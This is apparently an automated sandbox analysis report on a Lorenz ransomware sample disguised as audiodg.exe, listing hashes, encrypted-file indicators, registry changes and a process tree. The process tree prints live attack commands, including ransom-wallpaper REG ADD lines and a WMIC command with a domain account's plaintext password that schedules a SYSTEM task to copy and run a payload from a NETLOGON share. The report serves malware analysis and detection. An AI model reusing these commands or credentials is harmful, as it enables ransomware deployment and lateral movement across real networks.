Analysis
-
max time kernel
375s -
max time network
360s -
platform
windows10_x64 -
resource
win10-en-20211104 -
submitted
14/11/2021, 04:39
Static task
static1
Behavioral task
behavioral1
Sample
audiodg.exe
Resource
win7-en-20211104
Behavioral task
behavioral2
Sample
audiodg.exe
Resource
win10-en-20211104
General
-
Target
audiodg.exe
-
Size
1.1MB
-
MD5
7b760f60fff500d3c7c408a8bc158e0e
-
SHA1
a4b41efc63460f980130b67eb33c0bd061206744
-
SHA256
a0ccb9019b90716c8ee1bc0829e0e04cf7166be2f25987abbc8987e65cef2e6f
-
SHA512
13662b1447806779d82a29fbb931ec8d400adacd9074c4bbce8db8afd34bbf0c87e43b7790c1631b8d4edc870dbf5348773beadea59a3f73438cdb072c24ae75
Malware Config
Extracted
C:\Users\Admin\Desktop\HELP_SECURITY_EVENT.html
Signatures
-
Modifies extensions of user files 2 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File created C:\Users\Admin\Pictures\SaveOpen.crw.Lorenz.sz40 audiodg.exe File created C:\Users\Admin\Pictures\WatchGrant.tiff.Lorenz.sz40 audiodg.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\T: audiodg.exe File opened (read-only) \??\A: audiodg.exe File opened (read-only) \??\L: audiodg.exe File opened (read-only) \??\M: audiodg.exe File opened (read-only) \??\N: audiodg.exe File opened (read-only) \??\P: audiodg.exe File opened (read-only) \??\G: audiodg.exe File opened (read-only) \??\H: audiodg.exe File opened (read-only) \??\K: audiodg.exe File opened (read-only) \??\R: audiodg.exe File opened (read-only) \??\U: audiodg.exe File opened (read-only) \??\Z: audiodg.exe File opened (read-only) \??\F: audiodg.exe File opened (read-only) \??\I: audiodg.exe File opened (read-only) \??\O: audiodg.exe File opened (read-only) \??\W: audiodg.exe File opened (read-only) \??\Y: audiodg.exe File opened (read-only) \??\V: audiodg.exe File opened (read-only) \??\X: audiodg.exe File opened (read-only) \??\B: audiodg.exe File opened (read-only) \??\E: audiodg.exe File opened (read-only) \??\J: audiodg.exe File opened (read-only) \??\Q: audiodg.exe File opened (read-only) \??\S: audiodg.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Control Panel\Desktop\Wallpaper = "C:\\Windows\\8K3e5x6k1v12.bmp" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.jobs_3.6.0.v20140424-0053.jar.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Office\root\Licenses16\MondoR_ConsumerSub_Bypass30-ppd.xrm-ms.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalR_Retail-ul-oob.xrm-ms.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Office\root\Licenses16\VisioStdO365R_Subscription-pl.xrm-ms.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_delete_18.svg.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ru-ru\AppStore_icon.svg.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ja-jp\ui-strings.js.Lorenz.sz40 audiodg.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-sampler.xml.Lorenz.sz40 audiodg.exe File created C:\Program Files\Java\jre1.8.0_66\release.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_Trial-ppd.xrm-ms.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Office\root\Office16\FPA_w1\WA104381125.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Send2Fluent.png.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Office\root\vfs\Fonts\private\GOTHICBI.TTF.Lorenz.sz40 audiodg.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\day-of-week-16.png.Lorenz.sz40 audiodg.exe File created C:\Program Files\Java\jre1.8.0_66\lib\deploy\messages_es.properties.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription1-ppd.xrm-ms.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Office\root\Licenses16\VisioProR_Retail2-ppd.xrm-ms.Lorenz.sz40 audiodg.exe File created C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\de.pak.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019VL_MAK_AE-ul-phn.xrm-ms.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.contrast-white_scale-180.png.Lorenz.sz40 audiodg.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.common_5.5.0.165303.jar.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp-ul-oob.xrm-ms.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN121.XML.Lorenz.sz40 audiodg.exe File created C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Functions\It.Tests.ps1.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-ma\ui-strings.js.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\selector.js.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\bun.png.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\pt-br\ui-strings.js.Lorenz.sz40 audiodg.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-nodes_zh_CN.jar.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial3-ul-oob.xrm-ms.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Spelling.api.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-ae\ui-strings.js.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\root\ui-strings.js.Lorenz.sz40 audiodg.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-sendopts.xml.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019VL_MAK_AE-ppd.xrm-ms.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Office\root\Licenses16\Word2019R_Grace-ppd.xrm-ms.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ja-jp\AppStore_icon.svg.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\selector.js.Lorenz.sz40 audiodg.exe File created C:\Program Files\7-Zip\Lang\zh-tw.txt.Lorenz.sz40 audiodg.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.security_1.2.0.v20130424-1801.jar.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019R_Retail-ul-phn.xrm-ms.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_hiContrast_bow.png.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\SearchEmail2x.png.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Century Schoolbook.xml.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription2-pl.xrm-ms.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\cs-cz\ui-strings.js.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Office\root\Integration\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_nextarrow_default.svg.Lorenz.sz40 audiodg.exe File created C:\Program Files\7-Zip\Lang\sv.txt.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL104.XML.Lorenz.sz40 audiodg.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository_1.1.300.v20131211-1531.jar.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\css\main-selector.css.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ui-strings.js.Lorenz.sz40 audiodg.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\ext\jhall-2.0_05.jar.Lorenz.sz40 audiodg.exe File created C:\Program Files\ShowResume.bmp.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp6-pl.xrm-ms.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe.manifest.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL116.XML.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\x_2x.png.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\nb-no\ui-strings.js.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Office\root\vfs\Fonts\private\MSUIGHUB.TTF.Lorenz.sz40 audiodg.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sk-sk\ui-strings.js.Lorenz.sz40 audiodg.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\PAPYRUS\PAPYRUS.ELM.Lorenz.sz40 audiodg.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\8K3e5x6k1v12.bmp audiodg.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies data under HKEY_USERS 8 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Control Panel\Desktop reg.exe Set value (str) \REGISTRY\USER\S-1-5-19\Control Panel\Desktop\Wallpaper = "C:\\Windows\\8K3e5x6k1v12.bmp" reg.exe Key created \REGISTRY\USER\S-1-5-20\Control Panel\Desktop reg.exe Set value (str) \REGISTRY\USER\S-1-5-20\Control Panel\Desktop\Wallpaper = "C:\\Windows\\8K3e5x6k1v12.bmp" reg.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\Wallpaper = "C:\\Windows\\8K3e5x6k1v12.bmp" reg.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\Wallpaper = "C:\\Windows\\8K3e5x6k1v12.bmp" reg.exe -
Modifies registry class 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Control Panel\Desktop reg.exe Key created \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Control Panel reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Control Panel\Desktop\Wallpaper = "C:\\Windows\\8K3e5x6k1v12.bmp" reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe 2020 audiodg.exe -
Suspicious use of AdjustPrivilegeToken 42 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 1788 WMIC.exe Token: SeSecurityPrivilege 1788 WMIC.exe Token: SeTakeOwnershipPrivilege 1788 WMIC.exe Token: SeLoadDriverPrivilege 1788 WMIC.exe Token: SeSystemProfilePrivilege 1788 WMIC.exe Token: SeSystemtimePrivilege 1788 WMIC.exe Token: SeProfSingleProcessPrivilege 1788 WMIC.exe Token: SeIncBasePriorityPrivilege 1788 WMIC.exe Token: SeCreatePagefilePrivilege 1788 WMIC.exe Token: SeBackupPrivilege 1788 WMIC.exe Token: SeRestorePrivilege 1788 WMIC.exe Token: SeShutdownPrivilege 1788 WMIC.exe Token: SeDebugPrivilege 1788 WMIC.exe Token: SeSystemEnvironmentPrivilege 1788 WMIC.exe Token: SeRemoteShutdownPrivilege 1788 WMIC.exe Token: SeUndockPrivilege 1788 WMIC.exe Token: SeManageVolumePrivilege 1788 WMIC.exe Token: 33 1788 WMIC.exe Token: 34 1788 WMIC.exe Token: 35 1788 WMIC.exe Token: 36 1788 WMIC.exe Token: SeIncreaseQuotaPrivilege 1788 WMIC.exe Token: SeSecurityPrivilege 1788 WMIC.exe Token: SeTakeOwnershipPrivilege 1788 WMIC.exe Token: SeLoadDriverPrivilege 1788 WMIC.exe Token: SeSystemProfilePrivilege 1788 WMIC.exe Token: SeSystemtimePrivilege 1788 WMIC.exe Token: SeProfSingleProcessPrivilege 1788 WMIC.exe Token: SeIncBasePriorityPrivilege 1788 WMIC.exe Token: SeCreatePagefilePrivilege 1788 WMIC.exe Token: SeBackupPrivilege 1788 WMIC.exe Token: SeRestorePrivilege 1788 WMIC.exe Token: SeShutdownPrivilege 1788 WMIC.exe Token: SeDebugPrivilege 1788 WMIC.exe Token: SeSystemEnvironmentPrivilege 1788 WMIC.exe Token: SeRemoteShutdownPrivilege 1788 WMIC.exe Token: SeUndockPrivilege 1788 WMIC.exe Token: SeManageVolumePrivilege 1788 WMIC.exe Token: 33 1788 WMIC.exe Token: 34 1788 WMIC.exe Token: 35 1788 WMIC.exe Token: 36 1788 WMIC.exe -
Suspicious use of WriteProcessMemory 42 IoCs
description pid Process procid_target PID 2020 wrote to memory of 4064 2020 audiodg.exe 70 PID 2020 wrote to memory of 4064 2020 audiodg.exe 70 PID 2020 wrote to memory of 4064 2020 audiodg.exe 70 PID 4064 wrote to memory of 4080 4064 cmd.exe 71 PID 4064 wrote to memory of 4080 4064 cmd.exe 71 PID 4064 wrote to memory of 4080 4064 cmd.exe 71 PID 2020 wrote to memory of 1724 2020 audiodg.exe 72 PID 2020 wrote to memory of 1724 2020 audiodg.exe 72 PID 2020 wrote to memory of 1724 2020 audiodg.exe 72 PID 1724 wrote to memory of 4176 1724 cmd.exe 73 PID 1724 wrote to memory of 4176 1724 cmd.exe 73 PID 1724 wrote to memory of 4176 1724 cmd.exe 73 PID 2020 wrote to memory of 4168 2020 audiodg.exe 74 PID 2020 wrote to memory of 4168 2020 audiodg.exe 74 PID 2020 wrote to memory of 4168 2020 audiodg.exe 74 PID 4168 wrote to memory of 4184 4168 cmd.exe 75 PID 4168 wrote to memory of 4184 4168 cmd.exe 75 PID 4168 wrote to memory of 4184 4168 cmd.exe 75 PID 2020 wrote to memory of 1588 2020 audiodg.exe 76 PID 2020 wrote to memory of 1588 2020 audiodg.exe 76 PID 2020 wrote to memory of 1588 2020 audiodg.exe 76 PID 1588 wrote to memory of 4336 1588 cmd.exe 77 PID 1588 wrote to memory of 4336 1588 cmd.exe 77 PID 1588 wrote to memory of 4336 1588 cmd.exe 77 PID 2020 wrote to memory of 4420 2020 audiodg.exe 78 PID 2020 wrote to memory of 4420 2020 audiodg.exe 78 PID 2020 wrote to memory of 4420 2020 audiodg.exe 78 PID 4420 wrote to memory of 4400 4420 cmd.exe 79 PID 4420 wrote to memory of 4400 4420 cmd.exe 79 PID 4420 wrote to memory of 4400 4420 cmd.exe 79 PID 2020 wrote to memory of 4316 2020 audiodg.exe 80 PID 2020 wrote to memory of 4316 2020 audiodg.exe 80 PID 2020 wrote to memory of 4316 2020 audiodg.exe 80 PID 4316 wrote to memory of 4288 4316 cmd.exe 81 PID 4316 wrote to memory of 4288 4316 cmd.exe 81 PID 4316 wrote to memory of 4288 4316 cmd.exe 81 PID 2020 wrote to memory of 3964 2020 audiodg.exe 82 PID 2020 wrote to memory of 3964 2020 audiodg.exe 82 PID 2020 wrote to memory of 3964 2020 audiodg.exe 82 PID 3964 wrote to memory of 1788 3964 cmd.exe 84 PID 3964 wrote to memory of 1788 3964 cmd.exe 84 PID 3964 wrote to memory of 1788 3964 cmd.exe 84
Processes
-
C:\Users\Admin\AppData\Local\Temp\audiodg.exe"C:\Users\Admin\AppData\Local\Temp\audiodg.exe"1⤵
- Modifies extensions of user files
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2020 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD "HKEY_USERS\.DEFAULT\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\8K3e5x6k1v12.bmp"2⤵
- Suspicious use of WriteProcessMemory
PID:4064 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_USERS\.DEFAULT\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\8K3e5x6k1v12.bmp"3⤵
- Modifies data under HKEY_USERS
PID:4080
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD "HKEY_USERS\S-1-5-19\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\8K3e5x6k1v12.bmp"2⤵
- Suspicious use of WriteProcessMemory
PID:1724 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_USERS\S-1-5-19\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\8K3e5x6k1v12.bmp"3⤵
- Modifies data under HKEY_USERS
PID:4176
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD "HKEY_USERS\S-1-5-20\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\8K3e5x6k1v12.bmp"2⤵
- Suspicious use of WriteProcessMemory
PID:4168 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_USERS\S-1-5-20\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\8K3e5x6k1v12.bmp"3⤵
- Modifies data under HKEY_USERS
PID:4184
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD "HKEY_USERS\S-1-5-21-1042495040-510797905-2613508344-1000\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\8K3e5x6k1v12.bmp"2⤵
- Suspicious use of WriteProcessMemory
PID:1588 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_USERS\S-1-5-21-1042495040-510797905-2613508344-1000\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\8K3e5x6k1v12.bmp"3⤵
- Sets desktop wallpaper using registry
PID:4336
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD "HKEY_USERS\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\8K3e5x6k1v12.bmp"2⤵
- Suspicious use of WriteProcessMemory
PID:4420 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_USERS\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\8K3e5x6k1v12.bmp"3⤵
- Modifies registry class
PID:4400
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD "HKEY_USERS\S-1-5-18\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\8K3e5x6k1v12.bmp"2⤵
- Suspicious use of WriteProcessMemory
PID:4316 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_USERS\S-1-5-18\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\8K3e5x6k1v12.bmp"3⤵
- Modifies data under HKEY_USERS
PID:4288
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c wmic /node:'0.0.0.0' /USER:'BioPlus.net\sqluser2' /PASSWORD:'az21x5t' process call create "cmd.exe /c schtasks /Create /F /RU System /SC ONLOGON /TN sz401 /TR 'copy \\BioPlus.net\NETLOGON\weams.exe %windir%lsamp.exe & start %windir%lsamp.exe' & SCHTASKS /run /TN sz401&SCHTASKS /Delete /TN sz401 /F"2⤵
- Suspicious use of WriteProcessMemory
PID:3964 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /node:'0.0.0.0' /USER:'BioPlus.net\sqluser2' /PASSWORD:'az21x5t' process call create "cmd.exe /c schtasks /Create /F /RU System /SC ONLOGON /TN sz401 /TR 'copy \\BioPlus.net\NETLOGON\weams.exe C:\Windowslsamp.exe & start C:\Windowslsamp.exe' & SCHTASKS /run /TN sz401&SCHTASKS /Delete /TN sz401 /F"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1788
-
-